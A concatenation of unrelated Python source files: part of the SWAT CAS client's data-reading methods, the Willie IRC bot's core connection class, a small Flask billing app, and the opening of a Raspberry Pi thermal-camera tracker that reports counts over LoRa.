If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_html`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_html('iris.html')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_html`
Returns
-------
:class:`CASTable`
'''
import pandas as pd
from swat import datamsghandlers as dmh
use_addtable = kwargs.pop('use_addtable', False)
out = []
table, kwargs = self._get_table_args(casout=casout, **kwargs)
for i, dframe in enumerate(pd.read_html(io, **kwargs)):
if i and table.get('table'):
table['table'] += str(i)
if not use_addtable or self._protocol.startswith('http'):
out.append(self.upload_frame(dframe, casout=table and table or None))
# importoptions=self._importoptions_from_dframe(dframe)
else:
table.update(dmh.PandasDataFrame(dframe).args.addtable)
out.append(self.retrieve('table.addtable', **table).casTable)
return out
def read_hdf(self, path_or_buf, casout=None, **kwargs):
'''
Read from the HDF store and create a CAS table
This method calls :func:`pandas.read_hdf` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
path_or_buf : string or file-like object
The path, URL, or file object that contains the HDF data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_hdf`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_hdf('iris.html')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_hdf`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_hdf', path_or_buf, casout=casout, **kwargs)
def read_sas(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read SAS files stored as XPORT or SAS7BDAT into a CAS table
This method calls :func:`pandas.read_sas` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : string or file-like object
The path, URL, or file object that contains the HDF data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sas`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sas('iris.sas7bdat')
>>> print(tbl.head())
See Also
--------
:func:`pandas.read_sas`
:meth:`upload_file`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sas', filepath_or_buffer, casout=casout, **kwargs)
def read_sql_table(self, table_name, con, casout=None, **kwargs):
'''
Read SQL database table into a CAS table
This method calls :func:`pandas.read_sql_table` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
table_name : string
Name of SQL table in database.
con : SQLAlchemy connectable (or database string URI)
Database connection.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sql_table`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sql_table('iris', dbcon)
>>> print(tbl.head())
Notes
-----
The data from the database will be pulled to the client machine
in the form of a :class:`pandas.DataFrame` then uploaded to CAS.
If you are moving large amounts of data, you may want to use
a direct database connecter from CAS.
See Also
--------
:func:`pandas.read_sql_table`
:meth:`read_sql_query`
:meth:`read_sql`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sql_table', table_name, con, casout=casout, **kwargs)
def read_sql_query(self, sql, con, casout=None, **kwargs):
'''
Read SQL query table into a CAS table
This method calls :func:`pandas.read_sql_query` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
sql : string
SQL to be executed.
con : SQLAlchemy connectable (or database string URI)
Database connection.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sql_query`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sql_query('select * from iris', dbcon)
>>> print(tbl.head())
Notes
-----
The data from the database will be pulled to the client machine
in the form of a :class:`pandas.DataFrame` then uploaded to CAS.
If you are moving large amounts of data, you may want to use
a direct database connecter from CAS.
See Also
--------
:func:`pandas.read_sql_query`
:meth:`read_sql_table`
:meth:`read_sql`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sql_query', sql, con, casout=casout, **kwargs)
def read_sql(self, sql, con, casout=None, **kwargs):
'''
Read SQL query or database table into a CAS table
This method calls :func:`pandas.read_sql` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
sql : string
SQL to be executed or table name.
con : SQLAlchemy connectable (or database string URI)
Database connection.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_sql`.
Examples
--------
>>> conn = swat.CAS()
>>> tbl = conn.read_sql('select * from iris', dbcon)
>>> print(tbl.head())
Notes
-----
The data from the database will be pulled to the client machine
in the form of a :class:`pandas.DataFrame` then uploaded to CAS.
If you are moving large amounts of data, you may want to use
a direct database connecter from CAS.
See Also
--------
:func:`pandas.read_sql`
:meth:`read_sql_table`
:meth:`read_sql_query`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_sql', sql, con, casout=casout, **kwargs)
def read_gbq(self, query, casout=None, **kwargs):
'''
Load data from a Google BigQuery into a CAS table
This method calls :func:`pandas.read_gbq` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
query : string
SQL-like query to return data values.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_gbq`.
See Also
--------
:func:`pandas.read_gbq`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_gbq', query, casout=casout, **kwargs)
def read_stata(self, filepath_or_buffer, casout=None, **kwargs):
'''
Read Stata file into a CAS table
This method calls :func:`pandas.read_stata` with the
given arguments, then uploads the resulting :class:`pandas.DataFrame`
to a CAS table.
Parameters
----------
filepath_or_buffer : string or file-like object
Path to .dta file or file-like object containing data.
casout : string or :class:`CASTable`, optional
The output table specification. This includes the following parameters.
name : string, optional
Name of the output CAS table.
caslib : string, optional
CASLib for the output CAS table.
label : string, optional
The label to apply to the output CAS table.
promote : boolean, optional
If True, the output CAS table will be visible in all sessions.
replace : boolean, optional
If True, the output CAS table will replace any existing CAS.
table with the same name.
**kwargs : any, optional
Keyword arguments to :func:`pandas.read_stata`.
See Also
--------
:func:`pandas.read_stata`
Returns
-------
:class:`CASTable`
'''
return self._read_any('read_stata', filepath_or_buffer, casout=casout, **kwargs)
def path_to_caslib(self, path, name=None, **kwargs):
'''
Return a caslib name for a given path
If a caslib does not exist for the current path or for a parent
path, a new caslib will be created.
Parameters
----------
path : string
The absolute path to the desired caslib directory
name : string, optional
The name to give to the caslib, if a new one is created
kwargs : keyword-parameter, optional
Additional parameters to use when creating a new caslib
Returns
-------
( caslib-name, relative-path )
The return value is a two-element tuple. The first element
is the name of the caslib. The second element is the relative
path to the requested directory from the caslib. The second
element will be blank if the given path matches a caslib,
or a new caslib is created.
'''
if not name:
name = 'Caslib_%x' % random.randint(0, 1e9)
activeonadd_key = None
subdirectories_key = None
datasource_key = None
for key, value in kwargs.items():
if key.lower() == 'activeonadd':
activeonadd_key = key
elif key.lower() == 'subdirectories':
subdirectories_key = key
elif key.lower() == 'datasource':
datasource_key = key
if not activeonadd_key:
activeonadd_key = 'activeonadd'
kwargs[activeonadd_key] = False
if not subdirectories_key:
subdirectories_key = 'subdirectories'
kwargs[subdirectories_key] = True
if not datasource_key:
datasource_key = 'datasource'
kwargs[datasource_key] = dict(srctype='path')
is_windows = self.server_type.startswith('win')
if is_windows:
sep = '\\'
normpath = path.lower()
else:
sep = '/'
normpath = path
if normpath.endswith(sep):
normpath = normpath[:-1]
info = self.retrieve('table.caslibinfo',
_messagelevel='error')['CASLibInfo']
for libname, item, subdirs in zip(info['Name'], info['Path'],
info['Subdirs']):
if item.endswith(sep):
item = item[:-1]
if is_windows:
item = item.lower()
if item == normpath:
if bool(subdirs) != bool(kwargs[subdirectories_key]):
raise SWATError('caslib exists, but subdirectories flag differs')
return libname, ''
elif normpath.startswith(item):
if bool(subdirs) != bool(kwargs[subdirectories_key]):
raise SWATError('caslib exists, but subdirectories flag differs')
return libname, path[len(item) + 1:]
out = self.retrieve('table.addcaslib', _messagelevel='error',
name=name, path=path, **kwargs)
if out.severity > 1:
raise SWATError(out.status)
return name, ''
def getone(connection, datamsghandler=None):
'''
Get a single response from a connection
Parameters
----------
connection : :class:`CAS` object
The connection/CASAction to get the response from.
datamsghandler : :class:`CASDataMsgHandler` object, optional
The object to use for data messages from the server.
Examples
--------
>>> conn = swat.CAS()
>>> conn.invoke('serverstatus')
>>> print(getone(conn))
See Also
--------
:meth:`CAS.invoke`
Returns
-------
:class:`CASResponse` object
'''
output = None, connection
# enable data messages as needed
if datamsghandler is not None:
errorcheck(connection._sw_connection.enableDataMessages(),
connection._sw_connection)
_sw_message = errorcheck(connection._sw_connection.receive(),
connection._sw_connection)
if _sw_message:
mtype = _sw_message.getType()
if mtype == 'response':
_sw_response = errorcheck(_sw_message.toResponse(
connection._sw_connection), _sw_message)
if _sw_response is not None:
output = CASResponse(_sw_response, connection=connection), connection
elif mtype == 'request' and datamsghandler is not None:
_sw_request = errorcheck(_sw_message.toRequest(
connection._sw_connection), _sw_message)
if _sw_request is not None:
req = CASRequest(_sw_request)
output = datamsghandler(req, connection)
elif mtype == 'request':
_sw_request = errorcheck(_sw_message.toRequest(
connection._sw_connection), _sw_message)
if _sw_request is not None:
req = CASRequest(_sw_request)
output = req, connection
if datamsghandler is not None:
errorcheck(connection._sw_connection.disableDataMessages(),
connection._sw_connection)
# Raise exception as needed
if isinstance(output[0], CASResponse):
exception_on_severity = get_option('cas.exception_on_severity')
if exception_on_severity is not None and \
output[0].disposition.severity >= exception_on_severity:
raise SWATCASActionError(output[0].disposition.status, output[0], output[1])
return output
def getnext(*objs, **kwargs):
'''
Return responses as they appear from multiple connections
Parameters
----------
*objs : :class:`CAS` objects and/or :class:`CASAction` objects
Connection/CASAction objects to watch for responses.
timeout : int, optional
Timeout for waiting for a response on each connection.
datamsghandler : :class:`CASDataMsgHandler` object, optional
The object to use for data messages from the server.
Examples
--------
>>> conn1 = swat.CAS()
>>> conn2 = swat.CAS()
>>> conn1.invoke('serverstatus')
>>> conn2.invoke('userinfo')
>>> for resp in getnext(conn1, conn2):
... for k, v in resp:
... print(k, v)
See Also
--------
:meth:`CAS.invoke`
Returns
-------
:class:`CASResponse` object
'''
timeout = kwargs.get('timeout', 0)
datamsghandler = kwargs.get('datamsghandler')
if len(objs) == 1 and isinstance(objs[0], (list, tuple, set)):
connections = list(objs[0])
else:
connections = list(objs)
# if the item in a CASAction, use the connection
for i, conn in enumerate(connections):
if isinstance(conn, CASAction):
conn.invoke()
connections[i] = conn.get_connection()
# TODO: Set timeouts; check for mixed connection types
if isinstance(connections[0]._sw_connection, rest.REST_CASConnection):
for item in connections:
yield getone(item)
return
_sw_watcher = errorcheck(clib.SW_CASConnectionEventWatcher(len(connections), timeout,
a2n(connections[
0]._soptions),
connections[0]._sw_error),
connections[0]._sw_error)
for item in connections:
errorcheck(_sw_watcher.addConnection(item._sw_connection), _sw_watcher)
try:
while True:
i = errorcheck(_sw_watcher.wait(), _sw_watcher)
# finished
if i == -2:
break
# timeout / retry
if i == -1:
yield [], None
yield getone(connections[i], datamsghandler=datamsghandler)
except (KeyboardInterrupt, SystemExit):
for conn in connections:
errorcheck(conn._sw_connection.stopAction(), conn._sw_connection)
raise
def dir_actions(obj):
''' Return list of CAS actionsets / actions associated with the object '''
if hasattr(obj, '__dir_actions__'):
return obj.__dir_actions__()
return []
def dir_members(obj):
''' Return list of members not including associated CAS actionsets / actions '''
if hasattr(obj, '__dir_members__'):
return obj.__dir_members__()
return dir(obj)
|
irc.py
|
# coding=utf-8
"""
irc.py - An Utility IRC Bot
Copyright 2008, Sean B. Palmer, inamidst.com
Copyright 2012, Edward Powell, http://embolalia.net
Copyright © 2012, Elad Alfassa <elad@fedoraproject.org>
Licensed under the Eiffel Forum License 2.
Willie: http://willie.dftba.net/
When working on core IRC protocol related features, consult protocol
documentation at http://www.irchelp.org/irchelp/rfc/
"""
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import sys
import re
import time
import socket
import asyncore
import asynchat
import os
import codecs
import traceback
from willie.logger import get_logger
from willie.tools import stderr, Identifier
from willie.trigger import PreTrigger, Trigger
try:
import select
import ssl
if not hasattr(ssl, 'match_hostname'):
# Attempt to import ssl_match_hostname from python-backports
import backports.ssl_match_hostname
ssl.match_hostname = backports.ssl_match_hostname.match_hostname
ssl.CertificateError = backports.ssl_match_hostname.CertificateError
has_ssl = True
except ImportError:
# no SSL support
has_ssl = False
import errno
import threading
from datetime import datetime
if sys.version_info.major >= 3:
unicode = str
LOGGER = get_logger(__name__)
class Bot(asynchat.async_chat):
def __init__(self, config):
ca_certs = config.core.ca_certs
asynchat.async_chat.__init__(self)
self.set_terminator(b'\n')
self.buffer = ''
self.nick = Identifier(config.core.nick)
"""Willie's current ``Identifier``. Changing this while Willie is running is
untested."""
self.user = config.core.user
"""Willie's user/ident."""
self.name = config.core.name
"""Willie's "real name", as used for whois."""
self.channels = []
"""The list of channels Willie is currently in."""
self.stack = {}
self.ca_certs = ca_certs
self.hasquit = False
self.sending = threading.RLock()
self.writing_lock = threading.Lock()
self.raw = None
# Right now, only accounting for two op levels.
# This might be expanded later.
# These lists are filled in startup.py, as of right now.
self.ops = dict()
"""
A dictionary mapping channels to a ``Identifier`` list of their operators.
"""
self.halfplus = dict()
"""
A dictionary mapping channels to a ``Identifier`` list of their half-ops and
ops.
"""
self.voices = dict()
"""
A dictionary mapping channels to a ``Identifier`` list of their voices,
half-ops and ops.
"""
# We need this to prevent error loops in handle_error
self.error_count = 0
self.connection_registered = False
""" Set to True when a server has accepted the client connection and
messages can be sent and received. """
# Work around bot.connecting missing in Python older than 2.7.4
if not hasattr(self, "connecting"):
self.connecting = False
def log_raw(self, line, prefix):
"""Log raw line to the raw log."""
if not self.config.core.log_raw:
return
if not os.path.isdir(self.config.core.logdir):
try:
os.mkdir(self.config.core.logdir)
except Exception as e:
stderr('There was a problem creating the logs directory.')
stderr('%s %s' % (str(e.__class__), str(e)))
stderr('Please fix this and then run Willie again.')
os._exit(1)
f = codecs.open(os.path.join(self.config.core.logdir, 'raw.log'),
'a', encoding='utf-8')
f.write(prefix + unicode(time.time()) + "\t")
temp = line.replace('\n', '')
f.write(temp)
f.write("\n")
f.close()
def safe(self, string):
"""Remove newlines from a string."""
if sys.version_info.major >= 3 and isinstance(string, bytes):
string = string.decode('utf8')
elif sys.version_info.major < 3:
if not isinstance(string, unicode):
string = unicode(string, encoding='utf8')
string = string.replace('\n', '')
string = string.replace('\r', '')
return string
def write(self, args, text=None):
"""Send a command to the server.
``args`` is an iterable of strings, which are joined by spaces.
``text`` is treated as though it were the final item in ``args``, but
is preceeded by a ``:``. This is a special case which means that
``text``, unlike the items in ``args`` may contain spaces (though this
constraint is not checked by ``write``).
In other words, both ``willie.write(('PRIVMSG',), 'Hello, world!')``
and ``willie.write(('PRIVMSG', ':Hello, world!'))`` will send
``PRIVMSG :Hello, world!`` to the server.
Newlines and carriage returns ('\\n' and '\\r') are removed before
sending. Additionally, if the message (after joining) is longer than
than 510 characters, any remaining characters will not be sent.
"""
args = [self.safe(arg) for arg in args]
if text is not None:
text = self.safe(text)
try:
self.writing_lock.acquire() # Blocking lock, can't send two things
# at a time
# From RFC2812 Internet Relay Chat: Client Protocol
# Section 2.3
#
# https://tools.ietf.org/html/rfc2812.html
#
# IRC messages are always lines of characters terminated with a
# CR-LF (Carriage Return - Line Feed) pair, and these messages SHALL
# NOT exceed 512 characters in length, counting all characters
# including the trailing CR-LF. Thus, there are 510 characters
# maximum allowed for the command and its parameters. There is no
# provision for continuation of message lines.
if text is not None:
temp = (' '.join(args) + ' :' + text)[:510] + '\r\n'
else:
temp = ' '.join(args)[:510] + '\r\n'
self.log_raw(temp, '>>')
self.send(temp.encode('utf-8'))
finally:
self.writing_lock.release()
def run(self, host, port=6667):
try:
self.initiate_connect(host, port)
except socket.error as e:
stderr('Connection error: %s' % e)
self.hasquit = True
def initiate_connect(self, host, port):
stderr('Connecting to %s:%s...' % (host, port))
source_address = ((self.config.core.bind_host, 0)
if self.config.core.bind_host else None)
self.set_socket(socket.create_connection((host, port),
source_address=source_address))
if self.config.core.use_ssl and has_ssl:
self.send = self._ssl_send
self.recv = self._ssl_recv
elif not has_ssl and self.config.core.use_ssl:
stderr('SSL is not avilable on your system, attempting connection '
'without it')
self.connect((host, port))
try:
asyncore.loop()
except KeyboardInterrupt:
print('KeyboardInterrupt')
self.quit('KeyboardInterrupt')
def quit(self, message):
"""Disconnect from IRC and close the bot."""
self.write(['QUIT'], message)
self.hasquit = True
# Wait for acknowledgement from the server. By RFC 2812 it should be
# an ERROR msg, but many servers just close the connection. Either way
# is fine by us.
# Closing the connection now would mean that stuff in the buffers that
# has not yet been processed would never be processed. It would also
# release the main thread, which is problematic because whomever called
# quit might still want to do something before main thread quits.
def handle_close(self):
self.connection_registered = False
self._shutdown()
stderr('Closed!')
# This will eventually call asyncore dispatchers close method, which
# will release the main thread. This should be called last to avoid
# race conditions.
self.close()
def part(self, channel, msg=None):
"""Part a channel."""
self.write(['PART', channel], msg)
def join(self, channel, password=None):
"""Join a channel
If `channel` contains a space, and no `password` is given, the space is
assumed to split the argument into the channel to join and its
password. `channel` should not contain a space if `password` is given.
"""
if password is None:
self.write(('JOIN', channel))
else:
self.write(['JOIN', channel, password])
def handle_connect(self):
if self.config.core.use_ssl and has_ssl:
if not self.config.core.verify_ssl:
self.ssl = ssl.wrap_socket(self.socket,
do_handshake_on_connect=True,
suppress_ragged_eofs=True)
else:
self.ssl = ssl.wrap_socket(self.socket,
do_handshake_on_connect=True,
suppress_ragged_eofs=True,
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=self.ca_certs)
try:
ssl.match_hostname(self.ssl.getpeercert(), self.config.core.host)
except ssl.CertificateError:
stderr("Invalid certficate, hostname mismatch!")
os.unlink(self.config.core.pid_file_path)
os._exit(1)
self.set_socket(self.ssl)
# Request list of server capabilities. IRCv3 servers will respond with
# CAP * LS (which we handle in coretasks). v2 servers will respond with
# 421 Unknown command, which we'll ignore
self.write(('CAP', 'LS'))
if self.config.core.auth_method == 'server':
password = self.config.core.auth_password
self.write(('PASS', password))
self.write(('NICK', self.nick))
self.write(('USER', self.user, '+iw', self.nick), self.name)
stderr('Connected.')
self.last_ping_time = datetime.now()
timeout_check_thread = threading.Thread(target=self._timeout_check)
timeout_check_thread.start()
ping_thread = threading.Thread(target=self._send_ping)
ping_thread.start()
def _timeout_check(self):
while self.connected or self.connecting:
if (datetime.now() - self.last_ping_time).seconds > int(self.config.core.timeout):
stderr('Ping timeout reached after %s seconds, closing connection' % self.config.core.timeout)
self.handle_close()
break
else:
time.sleep(int(self.config.core.timeout))
def _send_ping(self):
while self.connected or self.connecting:
if self.connected and (datetime.now() - self.last_ping_time).seconds > int(self.config.core.timeout) / 2:
try:
self.write(('PING', self.config.core.host))
except socket.error:
pass
time.sleep(int(self.config.core.timeout) / 2)
def _ssl_send(self, data):
"""Replacement for self.send() during SSL connections."""
try:
result = self.socket.send(data)
return result
except ssl.SSLError as why:
if why[0] in (asyncore.EWOULDBLOCK, errno.ESRCH):
return 0
else:
raise why
return 0
def _ssl_recv(self, buffer_size):
"""Replacement for self.recv() during SSL connections.
From: http://evanfosmark.com/2010/09/ssl-support-in-asynchatasync_chat
"""
try:
data = self.socket.read(buffer_size)
if not data:
self.handle_close()
return ''
return data
except ssl.SSLError as why:
if why[0] in (asyncore.ECONNRESET, asyncore.ENOTCONN,
asyncore.ESHUTDOWN):
self.handle_close()
return ''
elif why[0] == errno.ENOENT:
# Required in order to keep it non-blocking
return ''
else:
raise
def collect_incoming_data(self, data):
# We can't trust clients to pass valid unicode.
try:
data = unicode(data, encoding='utf-8')
except UnicodeDecodeError:
# not unicode, let's try cp1252
try:
data = unicode(data, encoding='cp1252')
except UnicodeDecodeError:
# Okay, let's try ISO8859-1
try:
data = unicode(data, encoding='iso8859-1')
except:
# Discard line if encoding is unknown
return
if data:
self.log_raw(data, '<<')
self.buffer += data
def found_terminator(self):
line = self.buffer
if line.endswith('\r'):
line = line[:-1]
self.buffer = ''
self.last_ping_time = datetime.now()
pretrigger = PreTrigger(self.nick, line)
if pretrigger.event == 'PING':
self.write(('PONG', pretrigger.args[-1]))
elif pretrigger.event == 'ERROR':
LOGGER.error("ERROR recieved from server: %s", pretrigger.args[-1])
if self.hasquit:
self.close_when_done()
elif pretrigger.event == '433':
stderr('Nickname already in use!')
self.handle_close()
self.dispatch(pretrigger)
def dispatch(self, pretrigger):
pass
def msg(self, recipient, text, max_messages=1):
# We're arbitrarily saying that the max is 400 bytes of text when
# messages will be split. Otherwise, we'd have to acocunt for the bot's
# hostmask, which is hard.
max_text_length = 400
# Encode to bytes, for propper length calculation
if isinstance(text, unicode):
encoded_text = text.encode('utf-8')
else:
encoded_text = text
excess = ''
if max_messages > 1 and len(encoded_text) > max_text_length:
last_space = encoded_text.rfind(' '.encode('utf-8'), 0, max_text_length)
if last_space == -1:
excess = encoded_text[max_text_length:]
encoded_text = encoded_text[:max_text_length]
else:
excess = encoded_text[last_space + 1:]
encoded_text = encoded_text[:last_space]
# We'll then send the excess at the end
# Back to unicode again, so we don't screw things up later.
text = encoded_text.decode('utf-8')
try:
self.sending.acquire()
# No messages within the last 3 seconds? Go ahead!
# Otherwise, wait so it's been at least 0.8 seconds + penalty
recipient_id = Identifier(recipient)
if recipient_id not in self.stack:
self.stack[recipient_id] = []
elif self.stack[recipient_id]:
elapsed = time.time() - self.stack[recipient_id][-1][0]
if elapsed < 3:
penalty = float(max(0, len(text) - 50)) / 70
wait = 0.7 + penalty
if elapsed < wait:
time.sleep(wait - elapsed)
# Loop detection
messages = [m[1] for m in self.stack[recipient_id][-8:]]
# If what we about to send repeated at least 5 times in the
# last 2 minutes, replace with '...'
if messages.count(text) >= 5 and elapsed < 120:
text = '...'
if messages.count('...') >= 3:
# If we said '...' 3 times, discard message
return
self.write(('PRIVMSG', recipient), text)
self.stack[recipient_id].append((time.time(), self.safe(text)))
self.stack[recipient_id] = self.stack[recipient_id][-10:]
finally:
self.sending.release()
# Now that we've sent the first part, we need to send the rest. Doing
# this recursively seems easier to me than iteratively
if excess:
self.msg(recipient, excess, max_messages - 1)
def notice(self, dest, text):
"""Send an IRC NOTICE to a user or a channel.
See IRC protocol documentation for more information.
"""
self.write(('NOTICE', dest), text)
def error(self, trigger=None):
"""Called internally when a module causes an error."""
try:
trace = traceback.format_exc()
if sys.version_info.major < 3:
trace = trace.decode('utf-8', errors='xmlcharrefreplace')
stderr(trace)
try:
lines = list(reversed(trace.splitlines()))
report = [lines[0].strip()]
for line in lines:
line = line.strip()
if line.startswith('File "'):
report.append(line[0].lower() + line[1:])
break
else:
report.append('source unknown')
signature = '%s (%s)' % (report[0], report[1])
# TODO: make not hardcoded
log_filename = os.path.join(self.config.core.logdir, 'exceptions.log')
with codecs.open(log_filename, 'a', encoding='utf-8') as logfile:
logfile.write('Signature: %s\n' % signature)
if trigger:
logfile.write('from {} at {}. Message was: {}\n'.format(
trigger.nick, str(datetime.now()), trigger.group(0)))
logfile.write(trace)
logfile.write(
'----------------------------------------\n\n'
)
except Exception as e:
stderr("Could not save full traceback!")
LOGGER.error("Could not save traceback from %s to file: %s", trigger.sender, str(e))
if trigger:
self.msg(trigger.sender, signature)
except Exception as e:
if trigger:
self.msg(trigger.sender, "Got an error.")
LOGGER.error("Exception from %s: %s", trigger.sender, str(e))
def handle_error(self):
"""Handle any uncaptured error in the core.
Overrides asyncore's handle_error.
"""
trace = traceback.format_exc()
stderr(trace)
LOGGER.error('Fatal error in core, please review exception log')
# TODO: make not hardcoded
logfile = codecs.open(
os.path.join(self.config.core.logdir, 'exceptions.log'),
'a',
encoding='utf-8'
)
logfile.write('Fatal error in core, handle_error() was called\n')
logfile.write('last raw line was %s' % self.raw)
logfile.write(trace)
logfile.write('Buffer:\n')
logfile.write(self.buffer)
logfile.write('----------------------------------------\n\n')
logfile.close()
if self.error_count > 10:
if (datetime.now() - self.last_error_timestamp).seconds < 5:
print >> sys.stderr, "Too many errors, can't continue"
os._exit(1)
self.last_error_timestamp = datetime.now()
self.error_count = self.error_count + 1
# Helper functions to maintain the oper list.
# They cast to Identifier when adding to be quite sure there aren't any accidental
# string nicks. On deletion, you know you'll never need to worry about what
# the real superclass is, so we just cast and remove.
def add_op(self, channel, name):
if isinstance(name, Identifier):
self.ops[channel].add(name)
else:
self.ops[channel].add(Identifier(name))
def add_halfop(self, channel, name):
if isinstance(name, Identifier):
self.halfplus[channel].add(name)
else:
self.halfplus[channel].add(Identifier(name))
def add_voice(self, channel, name):
if isinstance(name, Identifier):
self.voices[channel].add(name)
else:
self.voices[channel].add(Identifier(name))
def del_op(self, channel, name):
self.ops[channel].discard(Identifier(name))
def del_halfop(self, channel, name):
self.halfplus[channel].discard(Identifier(name))
def del_voice(self, channel, name):
self.voices[channel].discard(Identifier(name))
def flush_ops(self, channel):
self.ops[channel] = set()
self.halfplus[channel] = set()
self.voices[channel] = set()
def init_ops_list(self, channel):
if channel not in self.halfplus:
self.halfplus[channel] = set()
if channel not in self.ops:
self.ops[channel] = set()
if channel not in self.voices:
self.voices[channel] = set()
|
app.py
|
import os
import sys
import time
from multiprocessing import Process
from datetime import datetime
from flask import render_template
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', '.'))
from auth import auth_bp
from admin import admin_bp, fetch_instances_cost_from_aws
from user_blueprint import user_bp
from settings import app, db
# Registaring blueprints
app.register_blueprint(auth_bp)
app.register_blueprint(admin_bp)
app.register_blueprint(user_bp)
@app.route('/')
def index():
return render_template('login.html')
def fetch_bill_from_aws(duration=86400):
while True:
fetch_instances_cost_from_aws()
delay = duration + int(time.time() / duration) * duration - time.time()
print("Going to sleep for %s seconds" % delay)
time.sleep(delay)
def bill_scheduler():
process = Process(target=fetch_bill_from_aws, args=(86400, ))
process.start()
bill_scheduler()
if __name__ == '__main__':
db.init_app(app)
app.run()
|
thermal_tracker.py
|
import pygame
import os
import math
import time
from datetime import datetime, date
import numpy as np
from scipy.interpolate import griddata
from scipy import stats
import cv2
from colour import Color
from CentroidTracker import CentroidTracker
from multiprocessing import Process, active_children
import pexpect
import argparse
import busio
import board
import adafruit_amg88xx
import json
import gpsd
import threading
import sys
import RPi.GPIO as GPIO
from dragino import Dragino
import logging
from trackableobject import TrackableObject
# some utility functions
def constrain(val, min_val, max_val):
return min(max_val, max(min_val, val))
def map_value(x, in_min, in_max, out_min, out_max):
return (x - in_min) * (out_max - out_min) / (in_max - in_min) + out_min
def send_lora(delay):
global payload
GPIO.setwarnings(False)
D = Dragino("dragino.ini.default", logging_level=logging.DEBUG)
while True:
while not D.registered():
print("Waiting")
sleep(2)
D.send(json.dumps(payload))
print("Sent message")
time.sleep(delay)
def count_within_range(list1, l, r):
'''
Helper function to count how many numbers in list1 falls into range [l,r]
'''
c = 0
# traverse in the list1
for x in list1:
# condition check
if x >= l and x <= r:
c += 1
return c
# a - latitude
# o - longitude
# c - count
payload = {'a': 0, 'o': 0, 'c': 0}
def main():
global payload
# argument parsing
parser = argparse.ArgumentParser()
parser.add_argument(
'--headless', help='run the pygame headlessly', action='store_true')
parser.add_argument(
"--color_depth", help="integer number of colors to use to draw temps", type=int)
parser.add_argument(
'--max_temp', help='initial max temperature', type=int)
parser.add_argument(
'--ambient_offset', help='value to offset ambient temperature by to get rolling MAXTEMP', type=int)
parser.add_argument(
'--ambient_time', help='length of ambient temperature collecting intervals in seconds', type=int)
parser.add_argument(
'--blob_min_threshold', help='blod detection min threshold', type=int)
parser.add_argument(
'--blob_max_threshold', help='blod detection min threshold', type=int)
parser.add_argument(
'--blob_filterbyarea', help='blod detection filter by area', action='store_true')
parser.add_argument(
'--blob_min_area', help='blod detection filter by area min area', type=int)
parser.add_argument(
'--blob_filterbycircularity', help='blod detection filter by circularity', action='store_true')
parser.add_argument(
'--blob_min_circularity', help='blod detection filter by circularity min circularity', type=float)
